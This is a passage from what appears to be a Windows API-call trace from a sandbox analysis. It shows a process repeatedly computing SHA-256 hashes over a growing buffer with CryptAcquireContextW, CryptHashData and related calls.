	[0192.496] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.496] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.497] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.497] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0192.497] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301540
	[0192.497] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301540, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301540, pdwDataLen=0x1283b0) returned 1
	[0192.497] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.497] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.497] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.498] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.498] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0192.498] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301568
	[0192.498] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301568, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301568, pdwDataLen=0x1283b0) returned 1
	[0192.498] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.498] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.498] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.498] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.498] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0192.499] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301590
	[0192.499] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301590, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301590, pdwDataLen=0x1283b0) returned 1
	[0192.499] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.499] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.499] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.499] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.499] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0192.499] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23015b8
	[0192.499] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23015b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23015b8, pdwDataLen=0x1283b0) returned 1
	[0192.499] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.499] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.499] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.500] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.500] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0192.500] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23015e0
	[0192.500] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23015e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23015e0, pdwDataLen=0x1283b0) returned 1
	[0192.500] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.500] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.500] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.501] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.501] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0192.501] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301608
	[0192.501] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301608, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301608, pdwDataLen=0x1283b0) returned 1
	[0192.501] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.501] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.501] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.502] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.502] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0192.502] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301630
	[0192.502] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301630, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301630, pdwDataLen=0x1283b0) returned 1
	[0192.502] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.502] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.502] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.502] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.502] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0192.502] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301658
	[0192.503] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301658, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301658, pdwDataLen=0x1283b0) returned 1
	[0192.503] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.503] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.503] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.503] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.503] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0192.503] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301680
	[0192.503] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301680, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301680, pdwDataLen=0x1283b0) returned 1
	[0192.503] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.503] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.503] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.504] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.504] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0192.504] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23016a8
	[0192.504] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23016a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23016a8, pdwDataLen=0x1283b0) returned 1
	[0192.504] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.504] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.504] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.505] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.505] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0192.505] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23016d0
	[0192.505] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23016d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23016d0, pdwDataLen=0x1283b0) returned 1
	[0192.505] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.505] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.505] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.506] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.506] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0192.506] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23016f8
	[0192.506] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23016f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23016f8, pdwDataLen=0x1283b0) returned 1
	[0192.506] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.506] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.506] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.506] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.506] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0192.507] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301720
	[0192.507] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301720, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301720, pdwDataLen=0x1283b0) returned 1
	[0192.507] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.507] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.507] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.507] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.507] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0192.507] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301748
	[0192.507] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301748, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301748, pdwDataLen=0x1283b0) returned 1
	[0192.507] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.507] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.507] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.508] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.508] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0192.508] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301770
	[0192.508] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301770, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301770, pdwDataLen=0x1283b0) returned 1
	[0192.508] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.508] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.508] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.509] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.509] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0192.509] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301798
	[0192.509] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301798, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301798, pdwDataLen=0x1283b0) returned 1
	[0192.509] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.509] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.509] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.510] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.510] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0192.510] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23017c0
	[0192.510] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23017c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23017c0, pdwDataLen=0x1283b0) returned 1
	[0192.510] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.510] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.510] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.510] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.510] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0192.510] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23017e8
	[0192.510] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23017e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23017e8, pdwDataLen=0x1283b0) returned 1
	[0192.511] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.511] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.511] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.511] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.511] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0192.511] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301810
	[0192.511] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301810, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301810, pdwDataLen=0x1283b0) returned 1
	[0192.511] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.511] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.511] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.512] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.512] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0192.512] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301838
	[0192.512] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301838, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301838, pdwDataLen=0x1283b0) returned 1
	[0192.512] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.512] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.512] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.513] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.513] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0192.513] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301860
	[0192.513] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301860, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301860, pdwDataLen=0x1283b0) returned 1
	[0192.513] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.513] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.513] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.513] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.513] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0192.514] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301888
	[0192.514] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301888, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301888, pdwDataLen=0x1283b0) returned 1
	[0192.514] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.514] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.514] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.514] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.514] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0192.514] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23018b0
	[0192.514] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23018b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23018b0, pdwDataLen=0x1283b0) returned 1
	[0192.514] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.514] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.514] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.515] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.515] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0192.515] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23018d8
	[0192.515] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23018d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23018d8, pdwDataLen=0x1283b0) returned 1
	[0192.515] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.515] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.515] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.516] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.516] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0192.516] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301900
	[0192.516] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301900, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301900, pdwDataLen=0x1283b0) returned 1
	[0192.516] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.516] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.516] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
